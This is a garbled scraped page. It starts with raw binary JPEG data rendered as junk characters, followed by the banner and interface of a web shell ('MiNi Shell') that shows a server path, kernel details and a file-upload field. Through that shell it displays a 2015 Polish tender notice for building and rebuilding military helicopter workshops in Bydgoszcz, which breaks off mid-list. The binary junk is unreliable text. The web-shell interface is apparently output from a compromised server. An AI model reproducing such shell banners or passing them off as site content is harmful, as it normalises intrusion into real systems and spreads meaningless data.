JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150320/63348-N-2015.html

<p class="kh_header"><b>Bydgoszcz: Opracowanie dokumentacji projektowej i wykonanie na jej podstawie robót budowlano -montażowych dla czterech inwestycji realizowanych w Bydgoszczy, przy ul. Szubińskiej</b><br>
<b>Numer ogłoszenia: 63348 - 2015; data zamieszczenia: 20.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd  Infrastruktury , ul. Podchorążych 33, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052/3784285.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzi.hg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej i wykonanie na jej podstawie robót budowlano -montażowych dla czterech inwestycji realizowanych w Bydgoszczy, przy ul. Szubińskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej i wykonanie na jej podstawie robót budowlano -montażowych dla czterech inwestycji realizowanych w Bydgoszczy, przy ul. Szubińskiej:
A.	Zadanie 11333 - Budowa warsztatu remontowego
B.	Zadanie 11336 - Budowa magazynu mps
C.	Zadanie 11337 - Przebudowa budynku obsługowo-technicznego nr 121
D.	Zadanie 11338 - Przebudowa budynku remontu śmigłowców nr 52

opis przedmiotu:
Zadanie 11333 - Budowa warsztatu remontowego
Etap I:	opracowanie projektów budowlanych, uzyskanie niezbędnych opinii, uzgodnień oraz dokumentów formalno - prawnych umożliwiających prowadzenie robót budowlanych, zestawienia kosztów zadania wraz z harmonogramem rzeczowo - wartościowym, opracowanie projektów wykonawczych, specyfikacji technicznych
Etap II:	wykonanie robót budowlanych na podstawie zatwierdzonego 
przez Zamawiającego projektu budowlanego.
Budynek będzie wykonany w technologii mieszanej. Ściany murowane. Dach nad halą wyższy oparty na wiązarach kratowych o rozpiętością 20,00m. Wiązary oparte są na filarach żelbetowych wmurowanych w ściany boczne. Dach nad traktami bocznymi (niższymi) 
o szerokości 4,80m i 6,00m stanowią stropodachy o konstrukcji żelbetowej. Budynek będzie wyposażony w następujące instalacje: wody zimnej, wody ciepłej i cyrkulacji, gaśnicza - hydrantowa, grzewczą, kanalizacji sanitarnej, kanalizacji deszczowej, wentylacji mechanicznej i klimatyzacji, oświetlenia i gniazd wtykowych ogólnych 230V/400V, oświetlenia awaryjnego, siłową, sterowniczo - sygnalizacyjną, ochrony przepięciowej, odgromową, automatyczny system zasilania awaryjnego, alarmową, telefoniczną, instalację pneumatyczną, instalację alarmową, instalację sygnalizacji pożaru. Budowa będzie wymagać wycięcia 6 drzew. Projektowane są place i drogi betonowe o nacisku na oś 4 t chodnik z kostki betonowej zapewniający dojazd do istniejącej drogi. 
Parametry dotyczące zagospodarowania terenu
powierzchnia zabudowy	986,82 m2
powierzchnia utwardzona łącznie z naprawą	944,00 m2
powierzchnia biologicznie czynna	180,00 m2
Parametry dotyczące budynku
długość budynku	38,53 m
szerokość	31,33 m  
wysokość budynku	6,25 m
wysokość traktów bocznych	4,30 m
powierzchnia użytkowa 	900,34 m2
kubatura	5 428,00m3
Parametry dotyczące sieci i przyłączy
przyłącze wody zimnej	26 mb
sieć kanalizacji sanitarnej	44 mb
sieć kanalizacji deszczowej	88 mb
sieć cieplna	24 mb
przyłącze elektryczne	23 mb
przyłącze teletechniczne	10 mb

Zadanie 11336 - Budowa magazynu mps
Etap I:	opracowanie projektów budowlanych, uzyskanie niezbędnych opinii, uzgodnień oraz dokumentów formalno - prawnych umożliwiających prowadzenie robót budowlanych, zestawienia kosztów zadania wraz z harmonogramem rzeczowo - wartościowym, opracowanie projektów wykonawczych, specyfikacji technicznych
Etap II:	wykonanie robót budowlanych na podstawie zatwierdzonego 
przez Zamawiającego projektu budowlanego.
	Magazyn MPS będzie użytkowany będzie przez Polowe Warsztaty Lotnicze zlokalizowane na terenie Kompleksu przy ulicy Szubińskiej  w Bydgoszczy. W budynku będą przechowane substancje łatwopalne dla potrzeb bieżących warsztatów. W budynku będą 2 pomieszczenia magazynowe umożliwiające składowanie zróżnicowanych substancji pod względem charakterystyki. Budynek będzie wyposażony w następujące instalacje: grzewczą, kanalizacji deszczowej, wentylacji mechanicznej, oświetlenia, oświetlenia awaryjnego, sterowniczo - sygnalizacyjną, ochrony przepięciowej, odgromową, automatyczny system zasilania awaryjnego, instalację alarmową, instalację sygnalizacji pożaru.
	Parametry dotyczące zagospodarowania terenu
powierzchnia zabudowy	154,65 m2
powierzchnia utwardzona	160,00 m2
parametry dotyczące budynku
długość budynku	18,13 m
szerokość	8,53 m  
wysokość budynku	4,00 m
powierzchnia użytkowa	132,52 m2
kubatura	618,60m3
Parametry dotyczące sieci i przyłączy
sieć kanalizacji deszczowej	20 mb
sieć cieplna	10 mb
przyłącze elektryczne	10 mb
przyłącze teletechniczne	10 mb
Zadanie 11337 - Przebudowa budynku obsługowo-technicznego nr 121
Etap I:	opracowanie projektów budowlanych, uzyskanie niezbędnych opinii, uzgodnień oraz dokumentów formalno - prawnych umożliwiających prowadzenie robót budowlanych, zestawienia kosztów zadania wraz z harmonogramem rzeczowo - wartościowym, opracowanie projektów wykonawczych, specyfikacji technicznych
Etap II:	wykonanie robót budowlanych na podstawie zatwierdzonego 
	przez Zamawiającego projektu budowlanego.

Budynek będzie miejscem pracy dla 10 osób. Dostosowanie budynku będzie wymagało zastosowania następujących zmian funkcjonalnych: 
umieszczenia pomieszczenia ładowania butli p.poż. w komorze kurzowej, 
zamianę jednego pomieszczenia wentylatorni  na pomieszczenie dla centrali nawiewno-wywiewnej,
umieszczenie w składzie opału pomieszczenia UPS i magazynu części zamiennych.
Po przebudowie będzie przeznaczony dla wykonywania obsługi okresowej i specjalnej śmigłowców Mi-2 i W-3. Budynek będzie wyposażony w następujące instalacje: wody zimnej, wody ciepłej i cyrkulacji, gaśnicza - hydrantowa, grzewczą, kanalizacji sanitarnej, kanalizacji deszczowej, wentylacji mechanicznej i klimatyzacji, oświetlenia i gniazd wtykowych ogólnych 230V/400V, oświetlenia awaryjnego, siłową, sterowniczo - sygnalizacyjną, ochrony przepięciowej, odgromową, automatyczny system zasilania awaryjnego, alarmową, telefoniczną, instalację pneumatyczną, instalację alarmową, instalację sygnalizacji pożaru.
Parametry dotyczące zagospodarowania terenu
powierzchnia zabudowy przed przebudową 	1 188,15 m2
powierzchnia zabudowy po przebudowie	1 207,52 m2
powierzchnia utwardzona łącznie z naprawą	763,0 m2
powierzchnia biologicznie czynna	900,0 m2
Parametry dotyczące budynku ETAP I - po przebudowie
długość budynku	39,45 m
szerokość	38,42 m  
wysokość budynku	8,29 m
wysokość traktów bocznych	4,40 m
powierzchnia użytkowa	1 072,99 m2
kubatura	7 575,00 m3
Parametry dotyczące sieci i przyłączy ETAP II
przyłącze wody zimnej (w tym również przełożenie sieci)	 119 mb
sieć kanalizacji deszczowej	261 mb
sieci i przyłącza centralnego ogrzewania (przebudowa, przełożenie i podłączenie istniejących budynków)	129 mb
sieci i przyłącze elektryczne (przebudowa i przełożenie)	 186 mb
przyłącza kablowe nn zasilania podstawowego i rezerwowego	410 mb
przyłącze teletechniczne  światłowodowe	240 mb
przyłącze teletechniczne kablem miedzianym	420 mb         
Zadanie 11338 - Przebudowa budynku remontu śmigłowców nr 52
Etap I:	opracowanie projektów budowlanych, uzyskanie niezbędnych opinii, uzgodnień oraz dokumentów formalno - prawnych umożliwiających prowadzenie robót budowlanych, zestawienia kosztów zadania wraz z harmonogramem rzeczowo - wartościowym, opracowanie projektów wykonawczych, specyfikacji technicznych
Etap II:	wykonanie robót budowlanych na podstawie zatwierdzonego przez Zamawiającego projektu budowlanego.
Przedmiot zamówienia obejmuje m.in. wykonanie robót budowlanych w zakresie:
przebudowę pomieszczeń z dostosowaniem do planowanej funkcji produkcyjno -magazynowej budowa i montaż dźwigu słupowego, zabezpieczeń przed upadkiem z wysokości) wraz z zapleczem socjalno - biurowym;
przebudowę pomieszczeń higieniczno - sanitarnych i socjalnych z dostosowaniem do planowanej liczby przebywających osób;
dostosowanie pomieszczeń do wymogów przepisów ppoż, bhp i higieniczno - sanitarnych oraz MON;
kompleksową termomodernizację budynku wraz ze wzmocnieniem konstrukcji dachu, wymianą bram oraz świetlików dachowych i nadbramowych,
wymiana instalacji wodno - kanalizacyjnej z przyłączami,
wymiana instalacji elektrycznej;
wykonanie instalacji teletechnicznych (telefony, MIL-WAN)
przebudowę instalacji grzewczej z przyłączem i budową węzła dwufunkcyjnego;
wykonanie klimatyzacji centralnej w zakresie komfortu termicznego i wilgotnościowego w wybranych pomieszczeniach;
wykonanie stałej instalacji gaśniczej;
wykonanie instalacji hydrantowej;
wykonanie elementów zagospodarowania terenu: naprawa nawierzchni placu przed hangarem, dojścia, dojazdy, opaska wokół budynku , elementy zieleni i małej architektury
Powierzchnia zabudowy budynku: 	2 801,8 m2
Kubatura budynku:	17 334 m3
Powierzchnia użytkowa budynku:	2 594,29 m2 
Długość 	83,71 m
Szerokość max	40,30 m
Wysokość średnia hangaru 	7,80 m
Wysokość średnia przybudówek	4,50 m
Liczba kondygnacji naziemnych   	1
Liczba kondygnacji podziemnych  	0.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.03.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wymagane jest wniesienie wadium w wysokości 350.000zł. wadium nalezy wnieść przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia zobowiązany jest wykazać się nw. doświadczeniem:
) doświadczenie projektowe:
Wykonawca musi wykazać się opracowaniem minimum jednej dokumentacji projektowej w zakresie budowy lub przebudowy budynku remontowo-technicznego o konstrukcji mieszanej o kubaturze min. 4 500 m3, o wartości robót budowlano-instalacyjnych min. 10 mln zł brutto 
b) doświadczenie wykonawcze:
Wykonawca musi wykazać się wykonaniem min. jednej roboty budowlanej w zakresie budowy lub przebudowy budynku remontowo-technicznego o konstrukcji mieszanej o kubaturze min. 4 500 m3, o wartości robót budowlano-instalacyjnych min. 10 mln zł brutto 

Dopuszcza się wykonanie powyższych prac w systemie zaprojektuj i wybuduj.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania wymagań w zakresie ochrony informacji niejawnych wykonawca musi wykazać się:
1)  dysponowaniem systemem teleinformatycznym z akredytacją bezpieczeństwa teleinformatycznego do przetwarzania informacji o klauzuli minimum Zastrzeżone
2) zobowiązany jest posiadać pomieszczenie umożliwiające prowadzenie prac z niejawną dokumentacją o klauzuli ZASTRZEŻONE</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. wykonawca ubiegający się o udzielenie zamówienia musi spełniać następujący warunek dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca wyznaczy:
a)	projektantów:
projektanta branży konstrukcyjnej
projektanta branży architektonicznej
projektanta branży sanitarnej
projektanta branży elektrycznej
projektanta branży drogowej
projektanta instalacji niskoprądowych i specjalnych
b)	kierowników robót:
kierownika budowy z uprawnieniami o specjalności konstrukcyjno-budowlanej bez ograniczeń,
kierownika robót elektrycznych z uprawnieniami o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,
kierownika robót z uprawnieniami w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń
kierownika robót w specjalności drogowej
kwalifikowany pracownik zabezpieczenia technicznego wpisany na listę kwalifikowanych pracowników zabezpieczenia technicznego
2. W celu spełniania wymagań w zakresie ochrony informacji niejawnych Wykonawca musi dysponować:
a) pełnomocnikiem ds. ochrony informacji niejawnych, który musi posiadać aktualne zaświadczenie o odbyciu szkolenia w zakresie ochrony informacji niejawnych.
b) osobą pełniącą funkcję inspektora bezpieczeństwa teleinformatycznego, który został przeszkolony w zakresie bezpieczeństwa teleinformatycznego.
c) osobą pełniącą funkcję administratora systemu teleinformatycznego, który został przeszkolony w zakresie bezpieczeństwa teleinformatycznego.
d) kierownikiem budowy, kierownikami poszczególnych branż,projektantami poszczególnych branż, projektantami i instalatorami systemów ochronnych (SSWiN, SKD, TNS) posiadającymi poświadczeniami bezpieczeństwa lub upoważnieniami do dostępu do informacji niejawnych o klauzul ZASTRZEŻONE. Osoby te muszą posiadać aktualne zaświadczenia o przeszkoleniu w zakresie ochrony informacji niejawnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania ww. warunku wykonawca musi wykazać się:
1)posiadaniem opłaconej polisy ubezpieczeniowej od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 8 000 000,00 zł brutto,
2) w okresie ostatnich trzech pełnych lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, średnim rocznym przychodem netto ze sprzedaży w kwocie minimum 25 000 000,00 zł,
3) w okresie ostatnich dwóch pełnych lat obrotowych, a jeśli okres prowadzenia działalności jest krótszy dodatnią rentownością sprzedaży netto potwierdzoną wskaźnikiem liczonym jako iloraz:
zysk netto/przychody netto ze sprzedaży produktów, towarów i materiałów + pozostałe przychody operacyjne + przychody finansowe + zyski nadzwyczajne
4) Wskaźnik finansowy płynności szybkiej min. 1,4  za lata 2011, 2012, 2013 liczony wg. wzoru: (aktywa obrotowe - zapasy)/ zobowiązania krótkoterminowe.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W celu potwierdzenia spełniania warunku udziału w postępowaniu określonego w art. 22 ust. 1 pkt.2 ustawy Pzp Zamawiający żąda, aby w wykazie zostały zamieszczone zadania potwierdzające spełnianie warunku wiedzy i doświadczenia;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W celu potwierdzenia spełniania warunku udziału w postępowaniu określonego w art. 22 ust. 1 pkt.2 ustawy Pzp Zamawiający żąda, aby w wykazie zostały zamieszczone zadania potwierdzające spełnianie warunku wiedzy i doświadczenia;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

